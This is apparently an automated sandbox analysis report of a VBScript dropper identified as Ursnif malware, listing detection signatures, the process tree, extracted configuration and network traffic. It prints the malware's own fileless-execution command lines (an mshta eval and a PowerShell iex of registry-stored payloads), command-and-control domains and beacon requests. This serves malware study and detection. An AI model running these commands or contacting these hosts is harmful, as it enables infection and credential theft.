Loading ...

Play interactive tourEdit tour

Analysis Report 6znkPyTAVN7V.vbs

Overview

General Information

Sample Name:6znkPyTAVN7V.vbs
Analysis ID:321068
MD5:a5f063ac8cf23a274922a337a8eeac2c
SHA1:bfae866c96996f9d26ec356ea2b48caa8e2b64d7
SHA256:2dd9418ae38f181b5901be316cbb0deaa2205b2865a3c391105966b7d48fae2f

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Creates a thread in another existing process (thread injection)
Creates processes via WMI
Deletes itself after installation
Disables SPDY (HTTP compression, likely to perform web injects)
Found Tor onion address
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to steal Mail credentials (via file access)
Uses nslookup.exe to query domains
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 7100 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\6znkPyTAVN7V.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • iexplore.exe (PID: 6592 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6584 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6592 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 7016 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6592 CREDAT:17420 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 6732 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 1040 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6468 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\41myt1z4\41myt1z4.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6248 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES2F3F.tmp' 'c:\Users\user\AppData\Local\Temp\41myt1z4\CSC9757D2D6F9F84ABABCD57DA7E4EFF939.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 1604 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\dvgqxizg\dvgqxizg.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 4532 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4817.tmp' 'c:\Users\user\AppData\Local\Temp\dvgqxizg\CSC2062E18B5949488FB5158C917D4EBA9.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • control.exe (PID: 4456 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
    • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • cmd.exe (PID: 6620 cmdline: cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\9047.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 2916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • nslookup.exe (PID: 3424 cmdline: nslookup myip.opendns.com resolver1.opendns.com MD5: AF1787F1DBE0053D74FC687E7233F8CE)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_17134_x64", "ip": "84.17.52.25*", "version": "250157", "uptime": "250", "system": "71d3df7c602bda1335102fc2c9a1d3ef", "crc": "3d255", "action": "00000001", "id": "2200", "time": "1605897760", "user": "3d11f4f58695dc15e71ab15cfb0b75a9", "soft": "1"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000003.414828910.0000000004D58000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000016.00000003.506842838.000002656DBD0000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000003.00000003.414892314.0000000004D58000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        0000001F.00000003.509721795.00000000027B0000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000003.00000003.423836026.0000000004BDB000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 18 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Dot net compiler compiles file from suspicious locationShow sources
            Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\41myt1z4\41myt1z4.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\41myt1z4\41myt1z4.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1040, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\41myt1z4\41myt1z4.cmdline', ProcessId: 6468
            Sigma detected: MSHTA Spawning Windows ShellShow sources
            Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6732, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ProcessId: 1040
            Sigma detected: Suspicious Csc.exe Source File FolderShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\41myt1z4\41myt1z4.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\41myt1z4\41myt1z4.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1040, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\41myt1z4\41myt1z4.cmdline', ProcessId: 6468

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\earmark.avchdAvira: detection malicious, Label: TR/Crypt.XDR.Gen
            Found malware configurationShow sources
            Source: explorer.exe.3440.31.memstrMalware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "ip": "84.17.52.25*", "version": "250157", "uptime": "250", "system": "71d3df7c602bda1335102fc2c9a1d3ef", "crc": "3d255", "action": "00000001", "id": "2200", "time": "1605897760", "user": "3d11f4f58695dc15e71ab15cfb0b75a9", "soft": "1"}
            Multi AV Scanner detection for domain / URLShow sources
            Source: c56.lepini.atVirustotal: Detection: 12%Perma Link
            Source: api3.lepini.atVirustotal: Detection: 10%Perma Link
            Source: api10.laptok.atVirustotal: Detection: 12%Perma Link
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\earmark.avchdReversingLabs: Detection: 45%
            Multi AV Scanner detection for submitted fileShow sources
            Source: 6znkPyTAVN7V.vbsVirustotal: Detection: 13%Perma Link
            Machine Learning detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\earmark.avchdJoe Sandbox ML: detected
            Source: C:\Windows\explorer.exeCode function: 31_2_04DE37B8 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,31_2_04DE37B8
            Source: C:\Windows\explorer.exeCode function: 31_2_04E091A0 CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,31_2_04E091A0
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior

            Networking:

            barindex
            Found Tor onion addressShow sources
            Source: powershell.exe, 00000016.00000003.506842838.000002656DBD0000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: control.exe, 0000001C.00000002.562589004.0000000000C0E000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: explorer.exe, 0000001F.00000003.509721795.00000000027B0000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Uses nslookup.exe to query domainsShow sources
            Source: unknownProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
            Source: global trafficHTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
            Source: Joe Sandbox ViewIP Address: 47.241.19.44 47.241.19.44
            Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
            Source: global trafficHTTP traffic detected: GET /api1/_2B3RKwW/iUs9mOE_2Fy587oYC_2FhiP/cqwrXVzOiN/3iy_2FEQhtiU4caUY/vWPEHIJ26Cxh/hxAwM2tWDkS/qSV4R5vbQ5WIYO/vg5dj3B7tqHn_2B5lMt8g/ZCmUbWqqhg2tfb6o/oSVPWNxkppLXqHK/vV8NxeiuEcG4zeTrzv/QP7ToNFgg/ooAdhPJGl1OBQCmkIaFe/emmxLHFFXg9hJQ1rXN3/R0lYYQ4mDPy013_2BEN29K/KCxOU_2Fu7g0U/2_2FUAD4/FmM_2B3LZkNPjT_0A_0Duh_/2Fckmk1sZB/GylmdmeslwIeJNcsI/5j5juAVhdr/efpdipqa/_2B HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/V1DBpeXcd2SVjySIO/8hTgDrr844Y9/FkNwDrqNmFQ/9oPqk4MIOokEEO/lAj4retEL8hBWD_2B0pxU/T7oLkBnwilwgrQ1C/AvHVEHenvUSVrMm/ORNvMXPydgnOdjqkcE/7xobo7HTI/u73jkfr_2FjHMJCI9rY_/2BjBbFYZ7F0eTv_2F_2/BYfIj0Dy67ek7AsPxEOFXL/T0hfdBRqc_2Fe/6YdiM0Di/NVBY3QI9vCDaT6RZ7Z_2Bsp/Tf56xI5YR0/r4h0IdnvWama32P8r/O_0A_0DQ7_2F/xwdj748yuth/QipPLmYlZrUIFf/ItsP98kSmplqzXo_2FbHs/x1amFzzsXuM/2v_2FCbB0Kb/f HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/QdpN8R1Zxydo1sWwz/dLDbxLZDRc0K/NqGQWShgOQF/J_2BAL2WZ8_2BO/wleDsz6XPtrejMXvExKU_/2B47KheFhTVz6OHb/U8BHNRse2TRbQUl/t4VunRcZuRVr1P5Yn8/vdcf8SUP6/tiGlFE6jFupRpiPfDk7q/1tiJD_2B3O0KnOAOHpk/hj_2B_2BJ_2FTygogOh927/rHfuAtp29MX7x/A_2B0dM4/eZkJa3YiO8U7UX1dLO9738r/QF_2FAV_2B/2P7sELH5zi9v_2FVk/N6T6tg_2Fhv_/0A_0DGou2O0/txLMOZmvcHnBqh/tXlcbpB0l_2B98Y5d82fD/5OpvYLLEKf7MUfb_/2BVb4feXqkslzZ/1 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
            Source: global trafficHTTP traffic detected: GET /api1/MGm_2BawPNnqv/qfARarLc/23L5WAJpq6aA5FcNoQawOw8/WY2g8fAdL6/NUu66E7OS0R_2BG57/OXAVzJZbFn8X/_2FSC9D9K6b/AbdxtvT02SkSw7/ZkCvirGXx0HM0tRJhZYZ_/2FwisZmcZhXU6gZ7/74WQUBqLJvkFLgc/o4J6CeVWx8F4FYZhHJ/7gzbcqiqM/JXYzTaXO4suSoccFx6OR/YQyFoZyErkPp2TAfMD9/L602sCubGMEbypmf_2BGCc/ZHk9_2FkS_2BQ/fsEW1_0A/_0DfIoRZGv1JHMAUdavz6FH/UJEF6aAPh1/TyQo1G51CZuwSA_/2B4G HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0Host: api3.lepini.at
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
            Source: unknownDNS traffic detected: queries for: api10.laptok.at
            Source: unknownHTTP traffic detected: POST /api1/2tB6HzcKS8r0WW7BAax/EpXwH5CwuRnFdJmKi5Wb0z/8L2XyFmuUk21U/q489sLw0/eYa15UFemmR_2B7v06lu5vZ/vv8LbddAYj/XqNowlO_2BXAYCqjQ/aD8hcjl_2FOt/pSFCqIQQoj_/2FMnv2bRbnt_2B/gat5l9a8xt_2BSKi_2BnF/Ycvl8NwzPykoI_2B/tPDx3U6gMTBe2j_/2B5pUjMJEk5uJWfdSo/hcLd6nUAU/DHphb1AEsxwfEaYhnZ7Z/1mtzQBAzvGMymAdx_2B/RxMGg_0A_0DDuMMHm1mDrd/9OXCQyyxJSC5W/eaK7kK7AE/tmjaexqRZ7OBc/X HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0Content-Length: 2Host: api3.lepini.at
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 20 Nov 2020 09:41:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
            Source: explorer.exe, 0000001F.00000000.545744038.00000000075A0000.00000002.00000001.sdmpString found in binary or memory: http://%s.com
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://amazon.fr/
            Source: explorer.exe, 0000001F.00000000.550538266.000000000D473000.00000004.00000001.sdmpString found in binary or memory: http://api10.laptok.at/api1/V1DBpeXcd2SVjySIO/8hTgDrr844Y9/FkNwDrqNmFQ/9oPqk4MIOokEEO/lAj4retEL8hBWD
            Source: explorer.exe, 0000001F.00000000.547816387.0000000008455000.00000004.00000001.sdmpString found in binary or memory: http://api10.laptok.at/api1/_2B3RKwW/iUs9mOE_2Fy587oYC_2FhiP/cqwrXVzOiN/3iy_2FEQhtiU4caUY/vWPEHIJ26C
            Source: explorer.exe, 0000001F.00000000.548344844.000000000854C000.00000004.00000001.sdmpString found in binary or memory: http://api3.lepini.at/api1/2tB6HzcKS8r0WW7BAax/EpXwH5CwuRnFdJmKi5Wb0z/8L2XyFmuUk21U/q489sLw0/eYa15UF
            Source: explorer.exe, 0000001F.00000000.548344844.000000000854C000.00000004.00000001.sdmpString found in binary or memory: http://api3.lepini.at/api1/MGm_2BawPNnqv/qfARarLc/23L5WAJpq6aA5FcNoQawOw8/WY2g8fAdL6/NUu66E7OS0R_2BG
            Source: explorer.exe, 0000001F.00000000.548486561.0000000008626000.00000004.00000001.sdmpString found in binary or memory: http://api3.lepini.at:80
            Source: explorer.exe, 0000001F.00000000.547816387.0000000008455000.00000004.00000001.sdmpString found in binary or memory: http://api3.lepini.at:80/api1/2tB6HzcKS8r0WW7BAax/EpXwH5CwuRnFdJmKi5Wb0z/8L2XyFmuUk21U/q489sLw0/eYa1
            Source: explorer.exe, 0000001F.00000000.548239180.000000000851A000.00000004.00000001.sdmpString found in binary or memory: http://api3.lepini.at:80/api1/MGm_2BawPNnqv/qfARarLc/23L5WAJpq6aA5FcNoQawOw8/WY2g8fAdL6/NUu66E7OS0R_
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
            Source: explorer.exe, 0000001F.00000000.545744038.00000000075A0000.00000002.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://busca.orange.es/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
